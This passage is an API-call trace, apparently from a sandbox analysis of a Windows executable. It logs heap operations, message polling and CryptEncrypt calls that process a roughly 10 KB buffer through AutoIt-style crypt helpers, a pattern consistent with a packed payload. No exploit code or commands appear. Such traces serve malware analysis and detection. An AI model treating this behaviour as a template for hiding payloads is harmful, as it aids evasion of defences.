hHeap=0x770000) returned 1 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0035.934] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.935] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da248, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da248*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0035.936] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.936] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.936] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0035.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.936] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.936] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.936] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.936] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.936] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.936] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.937] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.937] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.937] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.937] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x2926, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x2930) returned 1 [0035.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.937] CharLowerBuffW (in: lpsz="byte[10545]", cchLength=0xb | out: lpsz="byte[10545]") returned 0xb [0035.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.938] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.938] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95cba8*, pdwDataLen=0x6ae220*=0x2926, dwBufLen=0x2930 | out: pbData=0x95cba8*, pdwDataLen=0x6ae220*=0x2930) returned 1 [0035.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.938] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0035.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.938] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.939] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.939] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.939] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.939] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.939] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.939] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.939] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.939] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.940] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.940] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.940] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.941] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.941] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.941] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.941] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.941] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.942] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0035.942] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.942] CryptDestroyKey (hKey=0x7c2280) returned 1 [0035.942] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.942] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.942] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0035.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.942] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.942] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.942] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.942] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0035.942] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.942] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.943] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0035.943] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.943] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.943] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.943] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.943] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.943] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.943] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.943] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.943] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.943] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.943] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.943] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.944] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.944] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.944] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 